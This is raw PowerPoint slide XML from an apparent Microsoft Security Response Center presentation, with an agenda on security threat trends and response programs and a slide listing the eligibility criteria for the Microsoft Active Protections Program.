          <p:cNvPr id="49157" name="Picture 3" descr="D:\DVD_ART34\Artwork_Imagery\Icons - Illustrations\_SECURITY ICONS\Windows Update icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6338888" y="3878263"/>
            <a:ext cx="847725" cy="847725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49158" name="Picture 6" descr="D:\DVD_ART34\Artwork_Imagery\Icons - Illustrations\_WINDOWS VISTA ICONS\Secure PC computer security.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7939088" y="5783263"/>
            <a:ext cx="990600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="0"/>
            <a:ext cx="7467600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" rIns="45720" anchor="ctr">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" spc="-150" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFB9"/>
                    </a:gs>
                    <a:gs pos="36000">
                      <a:srgbClr val="FFFF99"/>
                    </a:gs>
                    <a:gs pos="86000">
                      <a:srgbClr val="F6AE1E"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Microsoft  Active Protections Program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" spc="-150" dirty="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFFFB9"/>
                  </a:gs>
                  <a:gs pos="36000">
                    <a:srgbClr val="FFFF99"/>
                  </a:gs>
                  <a:gs pos="86000">
                    <a:srgbClr val="F6AE1E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
                <a:tileRect/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="40000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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8"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Agenda </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209550" y="1387475"/>
            <a:ext cx="8761413" cy="7418388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Ecosystem &amp; Economy Trends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSRC Role &amp; View of the Ecosystem </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Response Process &amp; Team Members &amp; Activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evolution of Security Threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>From Web Defacement to Targeted Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evolution of MSRC Protections and Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Cooperation Program - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SCPCert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploitability Index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft Security Vulnerability Research (MSVR) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft Active Protections Program(MAPP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fad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78" name="Picture 2" descr="headline quote style 2 square"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="24000"/>
            <a:grayscl/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="341313" y="914400"/>
            <a:ext cx="8464550" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="1447800"/>
            <a:ext cx="6629400" cy="341313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NDA with Microsoft</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50180" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="1981200"/>
            <a:ext cx="6223000" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Must create active protections commercially for Microsoft Products</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50181" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3352800"/>
            <a:ext cx="6019800" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cannot be a primary seller of product used to attack Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50182" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="4191000"/>
            <a:ext cx="6096000" cy="341313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etc….There are more but these are the major ones</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50183" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="2667000"/>
            <a:ext cx="5930900" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Must service a significant Microsoft customer base of 10K+ users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50184" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="1981200"/>
            <a:ext cx="6324600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50185" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="2667000"/>
            <a:ext cx="6324600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50186" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="3352800"/>
            <a:ext cx="6324600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50187" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="4038600"/>
            <a:ext cx="6324600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50188" name="Picture 14" descr="check box"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1295400"/>
            <a:ext cx="533400" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50189" name="Picture 15" descr="check box"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1981200"/>
            <a:ext cx="533400" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50190" name="Picture 16" descr="check box"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="2667000"/>
            <a:ext cx="533400" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50191" name="Picture 17" descr="check box"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="3352800"/>
            <a:ext cx="533400" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50192" name="Picture 18" descr="check box"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4038600"/>
            <a:ext cx="533400" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246803" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="5257800"/>
            <a:ext cx="5930900" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>To find out more (and to apply)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/security/msrc/mapp/overview.mspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="0"/>
            <a:ext cx="7467600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" rIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" spc="-150" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFB9"/>
                    </a:gs>
                    <a:gs pos="36000">
                      <a:srgbClr val="FFFF99"/>
                    </a:gs>
                    <a:gs pos="86000">
                      <a:srgbClr val="F6AE1E"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MAPP Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" spc="-150" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFB9"/>
                    </a:gs>
                    <a:gs pos="36000">
                      <a:srgbClr val="FFFF99"/>
                    </a:gs>
                    <a:gs pos="86000">
                      <a:srgbClr val="F6AE1E"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Criteria</a:t>
            </a:r>
          </a:p>
        </p:txBody>
